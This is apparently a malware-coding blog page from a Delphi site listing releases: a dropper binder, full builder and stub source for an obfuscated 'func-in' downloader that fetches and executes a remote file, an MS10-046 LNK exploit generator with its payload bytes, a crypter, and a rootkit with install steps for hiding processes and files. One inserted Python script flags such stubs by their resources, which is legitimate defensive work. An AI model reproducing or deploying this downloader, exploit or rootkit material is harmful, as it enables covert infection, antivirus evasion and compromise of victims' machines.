Delphi Basics Counterstrikewi Releases


Voik Binder

posted 19 Jul 2011, 15:20 by Delphi Basics   [ updated 28 Jul 2011, 11:39 ]

This Delphi source code details a dropper binder written by Voik.

Version 0.1 
-Func-in method 
-Many anti debugging tricks 
-Stub generated in run-time 
-Pure ASM stub 
-Very nice GUI  

Not working: 
-Icons 

Version 0.2
+ Added icon support 
+ Added execute in browser memory 
+ GUI improved 
+ Some bugs fixed and code optimized

Author: Voik
Compiled: Delphi 2007
Operating System: Windows Vista


Only Delphi source code is included in the archive.

Func-In Wininet Downloader

posted 24 Dec 2010, 08:22 by Delphi Basics

This Delphi source code example details the WinInet downloader, edited to use the func-in technique: the procedure that downloads and executes a file is stored in the resource section of the stub application, and the built stub loads and calls it from there when executed.

Builder:
program Builder;
//delphibasics.info & ic0de.org
//Authors: cswi, abhe & steve10120

const
  kernel32 = 'kernel32.dll';

type
  PByte = ^Byte;

function BeginUpdateResourceW(pFileName: PWideChar; bDeleteExistingResources: Boolean): Cardinal; stdcall; external kernel32 name 'BeginUpdateResourceW';
function UpdateResourceW(hUpdate: Cardinal; lpType, lpName: PWideChar; wLanguage: Word; lpData: Pointer; cbData: LongWord): Boolean; stdcall; external kernel32 name 'UpdateResourceW';
function EndUpdateResourceW(hUpdate: Cardinal; fDiscard: Boolean): Boolean; stdcall; external kernel32 name 'EndUpdateResourceW';

const
  cFuncIn : PWideChar = 'FUNCIN';

type
  TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
  TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
  TFuncInRecord = Record
    xGetProcAddress : TGetProcAddress;
    xLoadLibraryA : TLoadLibraryA;
  end;
  PFuncInRecord = ^TFuncInRecord;

procedure FuncIn(AFuncInRecord : PFuncInRecord; cUrl, cFile : pAnsiChar);
type
  PSecurityAttributes = ^TSecurityAttributes;
  TSecurityAttributes = record
    nLength: LongWord;
    lpSecurityDescriptor: Pointer;
    bInheritHandle: Boolean;
  end;
  POverlapped = ^TOverlapped;
  TOverlapped = record
    Internal: LongWord;
    InternalHigh: LongWord;
    Offset: LongWord;
    OffsetHigh: LongWord;
    hEvent: LongWord;
  end;
  TCreateFileA = function(lpFileName: PAnsiChar; dwDesiredAccess, dwShareMode: LongWord; lpSecurityAttributes: PSecurityAttributes; dwCreationDisposition, dwFlagsAndAttributes: LongWord; hTemplateFile: LongWord): LongWord; stdcall;
  TWriteFile = function(hFile: LongWord; const Buffer; nNumberOfBytesToWrite: LongWord; var lpNumberOfBytesWritten: LongWord; lpOverlapped: POverlapped): Boolean; stdcall;
  TCloseHandle = function(hObject: LongWord): Boolean; stdcall;
  TInternetOpenA = function(lpszAgent: PAnsiChar; dwAccessType: LongWord; lpszProxy, lpszProxyBypass: PAnsiChar; dwFlags: LongWord): Pointer; stdcall;
  TInternetOpenUrlA = function(hInet: Pointer; lpszUrl: PAnsiChar; lpszHeaders: PAnsiChar; dwHeadersLength: LongWord; dwFlags: LongWord; dwContext: LongWord): Pointer; stdcall;
  TInternetReadFile = function(hFile: Pointer; lpBuffer: Pointer; dwNumberOfBytesToRead: LongWord; var lpdwNumberOfBytesRead: LongWord): Boolean; stdcall;
  TInternetCloseHandle = function(hInet: Pointer): Boolean; stdcall;
  TShellExecuteA = function(hWnd: LongWord; Operation, FileName, Parameters, Directory: PAnsiChar; ShowCmd: Integer): LongWord; stdcall;
var
  szKernel32 : array [0..8] of AnsiChar;
  szWininet : array [0..7] of AnsiChar;
  szShell32 : array [0..7] of AnsiChar;
  szCreateFileA : array [0..11] of AnsiChar;
  szWriteFile : array [0..9] of AnsiChar;
  szCloseHandle : array [0..11] of AnsiChar;
  szInternetOpenA : array [0..13] of AnsiChar;
  szInternetOpenUrlA : array [0..16] of AnsiChar;
  szInternetReadFile : array [0..16] of AnsiChar;
  szInternetCloseHandle : array [0..19] of AnsiChar;
  szShellExecuteA : array [0..13] of AnsiChar;
  szopen : array [0..4] of AnsiChar;
  xCreateFileA : TCreateFileA;
  xWriteFile : TWriteFile;
  xCloseHandle : TCloseHandle;
  xInternetOpenA : TInternetOpenA;
  xInternetOpenUrlA : TInternetOpenUrlA;
  xInternetReadFile : TInternetReadFile;
  xInternetCloseHandle : TInternetCloseHandle;
  xShellExecuteA : TShellExecuteA;
  hKernel32, hWininet, hShell32 : LongWord;
  hSession, hURL: Pointer;
  Buffer: Array [1..1024] of Byte;
  BufferLen, FileHandle, BytesWritten: LongWord;
begin
  szKernel32[0] := 'K'; szKernel32[1] := 'e'; szKernel32[2] := 'r'; szKernel32[3] := 'n'; szKernel32[4] := 'e'; szKernel32[5] := 'l'; szKernel32[6] := '3'; szKernel32[7] := '2'; szKernel32[8] := #0;
  szWininet[0] := 'W'; szWininet[1] := 'i'; szWininet[2] := 'n'; szWininet[3] := 'i'; szWininet[4] := 'n'; szWininet[5] := 'e'; szWininet[6] := 't'; szWininet[7] := #0;
  szShell32[0] := 'S'; szShell32[1] := 'h'; szShell32[2] := 'e'; szShell32[3] := 'l'; szShell32[4] := 'l'; szShell32[5] := '3'; szShell32[6] := '2'; szShell32[7] := #0;
  szCreateFileA[0] := 'C'; szCreateFileA[1] := 'r'; szCreateFileA[2] := 'e'; szCreateFileA[3] := 'a'; szCreateFileA[4] := 't'; szCreateFileA[5] := 'e'; szCreateFileA[6] := 'F'; szCreateFileA[7] := 'i'; szCreateFileA[8] := 'l'; szCreateFileA[9] := 'e'; szCreateFileA[10] := 'A'; szCreateFileA[11] := #0;
  szWriteFile[0] := 'W'; szWriteFile[1] := 'r'; szWriteFile[2] := 'i'; szWriteFile[3] := 't'; szWriteFile[4] := 'e'; szWriteFile[5] := 'F'; szWriteFile[6] := 'i'; szWriteFile[7] := 'l'; szWriteFile[8] := 'e'; szWriteFile[9] := #0;
  szCloseHandle[0] := 'C'; szCloseHandle[1] := 'l'; szCloseHandle[2] := 'o'; szCloseHandle[3] := 's'; szCloseHandle[4] := 'e'; szCloseHandle[5] := 'H'; szCloseHandle[6] := 'a'; szCloseHandle[7] := 'n'; szCloseHandle[8] := 'd'; szCloseHandle[9] := 'l'; szCloseHandle[10] := 'e'; szCloseHandle[11] := #0;
  szInternetOpenA[0] := 'I'; szInternetOpenA[1] := 'n'; szInternetOpenA[2] := 't'; szInternetOpenA[3] := 'e'; szInternetOpenA[4] := 'r'; szInternetOpenA[5] := 'n'; szInternetOpenA[6] := 'e'; szInternetOpenA[7] := 't'; szInternetOpenA[8] := 'O'; szInternetOpenA[9] := 'p'; szInternetOpenA[10] := 'e'; szInternetOpenA[11] := 'n'; szInternetOpenA[12] := 'A'; szInternetOpenA[13] := #0;
  szInternetOpenUrlA[0] := 'I'; szInternetOpenUrlA[1] := 'n'; szInternetOpenUrlA[2] := 't'; szInternetOpenUrlA[3] := 'e'; szInternetOpenUrlA[4] := 'r'; szInternetOpenUrlA[5] := 'n'; szInternetOpenUrlA[6] := 'e'; szInternetOpenUrlA[7] := 't'; szInternetOpenUrlA[8] := 'O'; szInternetOpenUrlA[9] := 'p'; szInternetOpenUrlA[10] := 'e'; szInternetOpenUrlA[11] := 'n'; szInternetOpenUrlA[12] := 'U'; szInternetOpenUrlA[13] := 'r'; szInternetOpenUrlA[14] := 'l'; szInternetOpenUrlA[15] := 'A'; szInternetOpenUrlA[16] := #0;
  szInternetReadFile[0] := 'I'; szInternetReadFile[1] := 'n'; szInternetReadFile[2] := 't'; szInternetReadFile[3] := 'e'; szInternetReadFile[4] := 'r'; szInternetReadFile[5] := 'n'; szInternetReadFile[6] := 'e'; szInternetReadFile[7] := 't'; szInternetReadFile[8] := 'R'; szInternetReadFile[9] := 'e'; szInternetReadFile[10] := 'a'; szInternetReadFile[11] := 'd'; szInternetReadFile[12] := 'F'; szInternetReadFile[13] := 'i'; szInternetReadFile[14] := 'l'; szInternetReadFile[15] := 'e'; szInternetReadFile[16] := #0;
  szInternetCloseHandle[0] := 'I'; szInternetCloseHandle[1] := 'n'; szInternetCloseHandle[2] := 't'; szInternetCloseHandle[3] := 'e'; szInternetCloseHandle[4] := 'r'; szInternetCloseHandle[5] := 'n'; szInternetCloseHandle[6] := 'e'; szInternetCloseHandle[7] := 't'; szInternetCloseHandle[8] := 'C'; szInternetCloseHandle[9] := 'l'; szInternetCloseHandle[10] := 'o'; szInternetCloseHandle[11] := 's'; szInternetCloseHandle[12] := 'e'; szInternetCloseHandle[13] := 'H'; szInternetCloseHandle[14] := 'a'; szInternetCloseHandle[15] := 'n'; szInternetCloseHandle[16] := 'd'; szInternetCloseHandle[17] := 'l'; szInternetCloseHandle[18] := 'e'; szInternetCloseHandle[19] := #0;
  szShellExecuteA[0] := 'S'; szShellExecuteA[1] := 'h'; szShellExecuteA[2] := 'e'; szShellExecuteA[3] := 'l'; szShellExecuteA[4] := 'l'; szShellExecuteA[5] := 'E'; szShellExecuteA[6] := 'x'; szShellExecuteA[7] := 'e'; szShellExecuteA[8] := 'c'; szShellExecuteA[9] := 'u'; szShellExecuteA[10] := 't'; szShellExecuteA[11] := 'e'; szShellExecuteA[12] := 'A'; szShellExecuteA[13] := #0;
  szopen[0] := 'o'; szopen[1] := 'p'; szopen[2] := 'e'; szopen[3] := 'n'; szopen[4] := #0;
  with AFuncInRecord^ do
  begin
    hKernel32 := xLoadLibraryA(szKernel32);
    @xCreateFileA := xGetProcAddress(hKernel32, szCreateFileA);
    @xWriteFile := xGetProcAddress(hKernel32, szWriteFile);
    @xCloseHandle := xGetProcAddress(hKernel32, szCloseHandle);
    hWininet := xLoadLibraryA(szWininet);
    @xInternetOpenA := xGetProcAddress(hWininet, szInternetOpenA);
    @xInternetOpenUrlA := xGetProcAddress(hWininet, szInternetOpenUrlA);
    @xInternetReadFile := xGetProcAddress(hWininet, szInternetReadFile);
    @xInternetCloseHandle := xGetProcAddress(hWininet, szInternetCloseHandle);
    hShell32 := xLoadLibraryA(szShell32);
    @xShellExecuteA := xGetProcAddress(hShell32, szShellExecuteA);
    hSession := xInternetOpenA(nil, 0, nil, nil, 0);
    hURL := xInternetOpenURLA(hSession, cURL, nil, 0, 0, 0);
    FileHandle := xCreateFileA(cFile, $40000000, $00000002, nil, 2, $00000002, 0);
    BytesWritten := 0;
    repeat
      xInternetReadFile(hURL, @Buffer, SizeOf(Buffer), BufferLen);
      xWriteFile(FileHandle, Buffer, BufferLen, BytesWritten, nil);
    until BufferLen = 0;
    xCloseHandle(FileHandle);
    xInternetCloseHandle(hURL);
    xInternetCloseHandle(hSession);
    xShellExecuteA(0, szopen, cFile, nil, nil, 1);
  end;
end;

Function WriteResData(pFile: pointer; Size: integer; pwName: pWideChar):Boolean;
const
  pwServerFile : PWideChar = 'Stub.exe'  ;
var
  hResourceHandle: Cardinal;
begin
  hResourceHandle := BeginUpdateResourceW(pwServerFile, False);
  Result := UpdateResourceW(hResourceHandle, PWideChar(10), pwName, 0, pFile, Size);
  EndUpdateResourceW(hResourceHandle, False);
end;

function SizeOfProc(pAddr: pointer): Cardinal;
var dwSize: Cardinal;
begin
  dwSize := 0;
  repeat
    inc(dwSize);
  until PByte(Cardinal(pAddr)+dwSize-1)^ = $C3;
  Result := dwSize;
end;

begin
  WriteResData(@FuncIn, SizeOfProc(@FuncIn), cFuncIn);
  WriteResData(nil, 0, 'PACKAGEINFO');
  WriteResData(nil, 0, 'DVCLAL');
end.

Stub:
program Stub;

const
  cURL : PAnsiChar = 'http://www.google.co.za/intl/en_com/images/srpr/logo1w.png';
  cFile : PAnsiChar = 'C:\GoogleLogo.png';

const
  kernel32 = 'kernel32.dll';
  MEM_COMMIT = $1000;
  PAGE_EXECUTE_READWRITE = $40;
  MEM_RELEASE = $8000;

function GetProcAddress(hModule: Cardinal; lpProcName: PAnsiChar): Pointer; stdcall; external kernel32 name 'GetProcAddress';
function LoadLibraryA(lpLibFileName: PAnsiChar): Cardinal; stdcall; external kernel32 name 'LoadLibraryA';
function FindResourceW(hModule: Cardinal; lpName, lpType: PWideChar): Cardinal; stdcall; external kernel32 name 'FindResourceW';
function LoadResource(hModule: Cardinal; hResInfo: Cardinal): Cardinal; stdcall; external kernel32 name 'LoadResource';
function SizeofResource(hModule: Cardinal; hResInfo: Cardinal): LongWord; stdcall; external kernel32 name 'SizeofResource';
function VirtualAlloc(lpvAddress: Pointer; dwSize, flAllocationType, flProtect: LongWord): Pointer; stdcall; external kernel32 name 'VirtualAlloc';
function VirtualFree(lpAddress: Pointer; dwSize, dwFreeType: LongWord): Boolean; stdcall; external kernel32 name 'VirtualFree';

const
  cFuncIn : PWideChar = 'FUNCIN';

type
  TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
  TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
  TFuncInRecord = Record
    xGetProcAddress : TGetProcAddress;
    xLoadLibraryA : TLoadLibraryA;
  end;
  PFuncInRecord = ^TFuncInRecord;

  PFuncIn = ^TFuncIn;
  TFuncIn = procedure(pData : PFuncInRecord; lpTitle, lpMessage : pAnsiChar);

procedure ResGet(ResName: pwidechar; var data : pointer; var Size:LongWord);
var
  ResSrc: Cardinal;
  ResGlobal: Cardinal;
begin
  ResSrc := FindResourceW(0, ResName, PWideChar(10));
  ResGlobal := LoadResource(0, ResSrc);
  Data := Pointer(ResGlobal);
  Size := SizeofResource(0, ResSrc);
end;

procedure CopyMemory(Destination, Source:Pointer; dwSize:LongWord);
asm
  PUSH ECX
  PUSH ESI
  PUSH EDI
  MOV EDI, Destination
  MOV ESI, Source
  MOV ECX, dwSize
  REP MOVSB
  POP EDI
  POP ESI
  POP ECX
end;

var
  FuncIn : TFuncIn;
  pResource : Pointer;
  dwResourceSize : LongWord;
  AFuncInRecord : TFuncInRecord;
begin
  AFuncInRecord.xGetProcAddress := @GetProcAddress;
  AFuncInRecord.xLoadLibraryA := @LoadLibraryA;
  ResGet(cFuncIn, pResource, dwResourceSize);
  FuncIn := VirtualAlloc(nil, dwResourceSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  CopyMemory(@FuncIn, pResource, dwResourceSize);
  FuncIn(@AFuncInRecord,cUrl, cFile);
  VirtualFree(@FuncIn, 0, MEM_RELEASE);
end.

Func-In Delphi Example

posted 22 Dec 2010, 11:18 by Delphi Basics   [ updated 23 Dec 2010, 14:39 ]

The closed source "Func-In" technique was pioneered by p0ke (in Nidhogg Crypter) and shapeless (in Poison Ivy). This recreated, open source Delphi example details how to write functions to the resource section of your stub and then call those functions from resources upon execution. This keeps the size of the final application down, because only the selected functions are written to the stub.

Authors: Counterstrikewi, Abhe & Steve10120 
Websites: delphibasics.info & ic0de.org 
Compiled: Delphi 2007, Delphi XE

Slayer616 created his own func-in technology using shellcode:

Builder: 
program Builder;
//delphibasics.info & ic0de.org
//Authors: cswi, abhe & steve10120

const
  kernel32 = 'kernel32.dll';
  MB_YESNO = 4;
  MB_OK = 0;

type
  PByte = ^Byte;

function BeginUpdateResourceW(pFileName: PWideChar; bDeleteExistingResources: Boolean): Cardinal; stdcall; external kernel32 name 'BeginUpdateResourceW';
function UpdateResourceW(hUpdate: Cardinal; lpType, lpName: PWideChar; wLanguage: Word; lpData: Pointer; cbData: LongWord): Boolean; stdcall; external kernel32 name 'UpdateResourceW';
function EndUpdateResourceW(hUpdate: Cardinal; fDiscard: Boolean): Boolean; stdcall; external kernel32 name 'EndUpdateResourceW';

const
  cFuncIn : PWideChar = 'FUNCIN';

type
  TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
  TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
  TFuncInRecord = Record
    xGetProcAddress : TGetProcAddress;
    xLoadLibraryA : TLoadLibraryA;
  end;
  PFuncInRecord = ^TFuncInRecord;

procedure FuncIn(AFuncInRecord : PFuncInRecord; lpText, lpCaption : pAnsiChar);
type
  TMessageBoxA = function (hWnd: Cardinal; lpText, lpCaption: PAnsiChar; uType: LongWord): LongWord; stdcall;
var
  szUser32 : array[0..6] of AnsiChar;
  szMessageBoxA : array[0..11] of AnsiChar;
  xMessageBoxA : TMessageBoxA;
  dwResult : LongWord;
begin
  szUser32[0] := 'U';
  szUser32[1] := 's';
  szUser32[2] := 'e';
  szUser32[3] := 'r';
  szUser32[4] := '3';
  szUser32[5] := '2';
  szUser32[6] := #0;
  szMessageBoxA[0] := 'M';
  szMessageBoxA[1] := 'e';
  szMessageBoxA[2] := 's';
  szMessageBoxA[3] := 's';
  szMessageBoxA[4] := 'a';
  szMessageBoxA[5] := 'g';
  szMessageBoxA[6] := 'e';
  szMessageBoxA[7] := 'B';
  szMessageBoxA[8] := 'o';
  szMessageBoxA[9] := 'x';
  szMessageBoxA[10] := 'A';
  szMessageBoxA[11] := #0;
  with AFuncInRecord^ do
  begin
    @xMessageBoxA := xGetProcAddress(xLoadLibraryA(szUser32), szMessageBoxA);
    if Assigned(xMessageBoxA) then
    begin
      dwResult := xMessageBoxA(0, lpText, lpCaption, MB_YESNO);
      if dwResult = 6 then
        xMessageBoxA(0, lpText, lpCaption, MB_OK);
    end;
  end;
end;

Function WriteResData(pFile: pointer; Size: integer; pwName: pWideChar):Boolean;
const
  pwServerFile : PWideChar = 'Stub.exe'  ;
var
  hResourceHandle: Cardinal;
begin
  hResourceHandle := BeginUpdateResourceW(pwServerFile, False);
  Result := UpdateResourceW(hResourceHandle, PWideChar(10), pwName, 0, pFile, Size);
  EndUpdateResourceW(hResourceHandle, False);
end;

function SizeOfProc(pAddr: pointer): Cardinal;
var dwSize: Cardinal;
begin
  dwSize := 0;
  repeat
    inc(dwSize);
  until PByte(Cardinal(pAddr)+dwSize-1)^ = $C3;
  Result := dwSize;
end;

begin
  WriteResData(@FuncIn, SizeOfProc(@FuncIn), cFuncIn);
  WriteResData(nil, 0, 'PACKAGEINFO');
  WriteResData(nil, 0, 'DVCLAL');
end.

Stub:
program Stub;

const
  kernel32 = 'kernel32.dll';
  MEM_COMMIT = $1000;
  PAGE_EXECUTE_READWRITE = $40;
  MEM_RELEASE = $8000;

function GetProcAddress(hModule: Cardinal; lpProcName: PAnsiChar): Pointer; stdcall; external kernel32 name 'GetProcAddress';
function LoadLibraryA(lpLibFileName: PAnsiChar): Cardinal; stdcall; external kernel32 name 'LoadLibraryA';
function FindResourceW(hModule: Cardinal; lpName, lpType: PWideChar): Cardinal; stdcall; external kernel32 name 'FindResourceW';
function LoadResource(hModule: Cardinal; hResInfo: Cardinal): Cardinal; stdcall; external kernel32 name 'LoadResource';
function SizeofResource(hModule: Cardinal; hResInfo: Cardinal): LongWord; stdcall; external kernel32 name 'SizeofResource';
function VirtualAlloc(lpvAddress: Pointer; dwSize, flAllocationType, flProtect: LongWord): Pointer; stdcall; external kernel32 name 'VirtualAlloc';
function VirtualFree(lpAddress: Pointer; dwSize, dwFreeType: LongWord): Boolean; stdcall; external kernel32 name 'VirtualFree';

const
  cFuncIn : PWideChar = 'FUNCIN';

type
  TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
  TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
  TFuncInRecord = Record
    xGetProcAddress : TGetProcAddress;
    xLoadLibraryA : TLoadLibraryA;
  end;
  PFuncInRecord = ^TFuncInRecord;

  PFuncIn = ^TFuncIn;
  TFuncIn = procedure(pData : PFuncInRecord; lpTitle, lpMessage : pAnsiChar);

procedure ResGet(ResName: pwidechar; var data : pointer; var Size:LongWord);
var
  ResSrc: Cardinal;
  ResGlobal: Cardinal;
begin
  ResSrc := FindResourceW(0, ResName, PWideChar(10));
  ResGlobal := LoadResource(0, ResSrc);
  Data := Pointer(ResGlobal);
  Size := SizeofResource(0, ResSrc);
end;

procedure CopyMemory(Destination, Source:Pointer; dwSize:LongWord);
asm
  PUSH ECX
  PUSH ESI
  PUSH EDI
  MOV EDI, Destination
  MOV ESI, Source
  MOV ECX, dwSize
  REP MOVSB
  POP EDI
  POP ESI
  POP ECX
end;

var
  FuncIn : TFuncIn;
  pResource : Pointer;
  dwResourceSize : LongWord;
  AFuncInRecord : TFuncInRecord;
begin
  AFuncInRecord.xGetProcAddress := @GetProcAddress;
  AFuncInRecord.xLoadLibraryA := @LoadLibraryA;
  ResGet(cFuncIn, pResource, dwResourceSize);
  FuncIn := VirtualAlloc(nil, dwResourceSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  CopyMemory(@FuncIn, pResource, dwResourceSize);
  FuncIn(@AFuncInRecord,'cswi <3 abhe & steve10120', '<3 p0ke');
  VirtualFree(@FuncIn, 0, MEM_RELEASE);
end.
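For a defender triaging binaries built this way, the telltales sit in the resource tree rather than in the code: a named RCDATA (type 10, the PWideChar(10) the builder uses) entry such as FUNCIN, and the absence of the DVCLAL and PACKAGEINFO resources that a Delphi-compiled executable normally carries and that WriteResData(nil, 0, ...) deletes. The following Python example is added here and is not part of either release above; it parses a raw .rsrc section (assumed already extracted from the PE by the caller) and reports those indicators, with a constructed resource blob as test input.

```python
"""Flag func-in style stubs by inspecting a raw PE .rsrc section (added example)."""
import struct

RT_RCDATA = 10                               # the type the builder writes as PWideChar(10)
DELPHI_MARKERS = ("DVCLAL", "PACKAGEINFO")   # RCDATA entries Delphi adds by default

def _read_name(rsrc, off):
    """Decode an IMAGE_RESOURCE_DIR_STRING_U (2-byte length + UTF-16LE chars)."""
    length = struct.unpack_from("<H", rsrc, off)[0]
    return rsrc[off + 2:off + 2 + 2 * length].decode("utf-16-le")

def _entries(rsrc, dir_off):
    """Yield (ident, target_off, is_subdir) for every entry of one resource directory.

    ident is an int for ID entries and a str for named entries; offsets are relative
    to the start of the .rsrc section with the high bit stripped. Truncated or
    malformed input raises struct.error, so a bulk scanner should catch that.
    """
    n_named, n_ids = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(n_named + n_ids):
        name_field, data_field = struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)
        if name_field & 0x80000000:
            ident = _read_name(rsrc, name_field & 0x7FFFFFFF)
        else:
            ident = name_field
        yield ident, data_field & 0x7FFFFFFF, bool(data_field & 0x80000000)

def rcdata_names(rsrc):
    """Return the names of all named RCDATA resources (type level -> name level)."""
    names = []
    for type_id, type_off, is_dir in _entries(rsrc, 0):
        if type_id != RT_RCDATA or not is_dir:
            continue
        for ident, _off, _sub in _entries(rsrc, type_off):
            if isinstance(ident, str):
                names.append(ident)
    return names

def funcin_indicators(rsrc):
    """Triage flags for one binary; the *_stripped flags only mean something
    if the file is otherwise identified as Delphi-built."""
    names = {n.upper() for n in rcdata_names(rsrc)}
    flags = {"funcin_resource": "FUNCIN" in names}
    for marker in DELPHI_MARKERS:
        flags[marker.lower() + "_stripped"] = marker not in names
    return flags

def build_rsrc(names):
    """Constructed fixture: a .rsrc blob with one RCDATA subtree holding each name."""
    n = len(names)
    type_dir = 24                        # root header (16) + one ID entry (8)
    lang_dirs = type_dir + 16 + 8 * n    # type header + n named entries
    data_ents = lang_dirs + 24 * n       # one language dir (header + 1 entry) per name
    strings = data_ents + 16 * n         # one IMAGE_RESOURCE_DATA_ENTRY per name
    out = bytearray(struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1))
    out += struct.pack("<II", RT_RCDATA, 0x80000000 | type_dir)
    out += struct.pack("<IIHHHH", 0, 0, 0, 0, n, 0)
    str_off = strings
    for i, name in enumerate(names):
        out += struct.pack("<II", 0x80000000 | str_off, 0x80000000 | (lang_dirs + 24 * i))
        str_off += 2 + 2 * len(name)
    for i in range(n):                   # language level: ID 0 -> data entry, not a subdir
        out += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1)
        out += struct.pack("<II", 0, data_ents + 16 * i)
    for i in range(n):                   # data entries: RVA, size, code page, reserved
        out += struct.pack("<IIII", 0x1000 + 16 * i, 4, 0, 0)
    for name in names:                   # string table: length-prefixed UTF-16LE names
        out += struct.pack("<H", len(name)) + name.encode("utf-16-le")
    return bytes(out)

if __name__ == "__main__":
    # What the builders above produce: FUNCIN present, Delphi markers deleted.
    print(funcin_indicators(build_rsrc(["FUNCIN"])))
    # An ordinary Delphi executable keeps its default RCDATA entries.
    print(funcin_indicators(build_rsrc(["DVCLAL", "PACKAGEINFO"])))
```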

[MS10-046] Cpl Lnk Exploit - Lnk Vulnerability by Paray_Vx

posted 9 Dec 2010, 15:16 by Delphi Basics

This code details the MS10-046 'CPL Lnk Exploit' in Delphi.

Cpl Lnk Vulnerability - MS10-046 in Delphi
Author: - Paray_Vx -
Tested and working on Windows XP, Windows Vista and Windows 7

program MS10046;
uses
  SysUtils,
  Windows;

procedure CplLnkExploit(location:string);
const
  // ShellCode Lnk Vulnerability
  Sizelnk :integer = 141;
  ShellCode  : ARRAY [1..141] OF Byte = (
$4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,$46,$81,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$01,
$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$36,$01,$14,$00,$1F,$50,$E0,$4F,$D0,$20,$EA,$3A,$69,$10,$A2,$D8,$08,$00,$2B,$30,$30,$9D,$14,$00,$2E,$1E,$20,$20,$EC,$21,$EA,$3A,$69,$10,$A2,$DD,$08,$00,$2B,$30,$30,$9D,$0C,$01,$00,$00,$00,
$00,$00,$00,$00,$00,$00,$00,$00,$6A,$00,$00,$00,$00,$00,$00,$20,$00,$3A);

// ~ Your Dll Here ~ Ex : 'C:\MS10046.dll'
  SizeNameDll : integer = 28;
  Dllx : ARRAY [1..28] OF Byte = ($00,$43,$00,$3A,$00,$5C,$00,$4D,$00,$53,$00,$31,$00,$30,$00,$30,$00,$34,$00,$36,$00,$2E,$00,$64,$00,$6C,$00,$6C);

var
 one : file;
 i : integer;

begin
 AssignFile(one,location);
 Rewrite(one,1);

  for i:=1 to Sizelnk do
  begin
   BlockWrite(one,ShellCode[i],1);
  end;

  for i:=1 to SizeNameDll do
  begin
   BlockWrite(one,Dllx[i],1);
  end;

  CloseFile(one);
end;

begin
     MessageBoxA(0,'CPL Lnk Exploit Built!', 'MS10-046', MB_OK);
     // Extract here
     CplLnkExploit('C:\MS10-046.lnk');
end.

Library MS10046;

uses
  Windows;

begin
     MessageBoxA(0, 'CPL Lnk Exploit Success!', 'MS10-046', MB_ICONWARNING);
end.

Many PCs are unpatched and vulnerable to this exploit. To protect yourself, patch your OS here:

Read more about the CPL Lnk Vulnerability (MS10-046) here:

Open Crypter by p0ke

posted 29 Sep 2010, 14:35 by Delphi Basics   [ updated 1 Mar 2011, 12:05 ]

Open Source Code Crypter 1.0
by p0ke

I wrote this opensource crypter for delphi coders.
It's nothing advanced, but I probably will add functions
to it with time.

Features:
  10 file limit
  Memory Execution support
  EOF-Settings support
  Custom Stub support
  Drop to Harddrive support

Joining Method: Resources
Encryption: Custom XOR
Memory Execution: uMemoryExecute by p0ke.  This unit is compatible with Windows XP & Vista but not compatible with Windows 7.


Only Delphi source code is included in the archive.

AFX Rootkit 2005 by Aphex

posted 18 Sep 2010, 15:07 by Delphi Basics

AFX Rootkit 2005 by Aphex 

This program patches Windows API to hide certain objects from being listed. 

WARNING -> FOR WINDOWS NT/2000/XP/2003 ONLY! 

Current Version Hides: 
a) Processes 
b) Handles 
c) Modules 
d) Files & Folders 
e) Registry Keys & Values 
f) Services 
g) TCP/UDP Sockets 
h) Systray Icons 

Configuring a computer with the rootkit is simple... 

1. Create a new folder with a unique name i.e. "c:\winnt\rewt\" 
2. In this folder place the root.exe i.e. "c:\winnt\rewt\root.exe" 
3. Execute root.exe with the "/i" parameter i.e. "start c:\winnt\rewt\root.exe /i" 
4. Inside this folder place any other programs or files. 

Everything inside the root folder is now invisible! If you place other services or programs 
in the root folder they will be invisible from process/file/dll/handle/socket/etc listing. 
However, all programs in the root folder can see each other. 

Registry value names are hidden differently from everything else. The name must begin with the 
root folder name followed by "\" and other characters i.e. "rewt\hiddenstartup1". 

Registry key names are hidden if they have the same name as the root folder i.e. "rewt".

Also, the root folder is unique throughout the system. This means "c:\rewt\", "c:\winnt\rewt\"
and "c:\winnt\system32\rewt\" all will be hidden because they all share the root folder name "rewt".

Removal:
If you install it make sure you know how to remove it!

  Method 1
   1. Run the root.exe with the "/u" parameter
   2. Delete all the files associated with it
   3. Reboot

  Method 2
   1. Boot into safe mode
   2. Locate the service with the root folder name
   3. Remove the service and delete all the files associated with it
   4. Reboot

How To Properly Compile AFX Rootkit 

Inside hook.dpr there is a variable...

var
szDllPath: pchar = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';

After compiling hook.dll you must open it with a hex editor and find the offset of that string of X's.

Once you find the offset you need to open root.dpr. Search for the hex number $4a54 and replace it with the new offset.

Each version of Delphi will have a different offset. The offset $4a54 is for Delphi 6. So you shouldn't need to change it if you use D6. It is always best to double check though.

Only Delphi source code is included in the archive.

MemExe Crypter by steve10120

posted 14 Sep 2010, 16:07 by Danny Rancher

This crypter is the latest rewrite of the self-injection code, by shapeless and steve10120. 

Original self-injecting crypter by shapeless: 
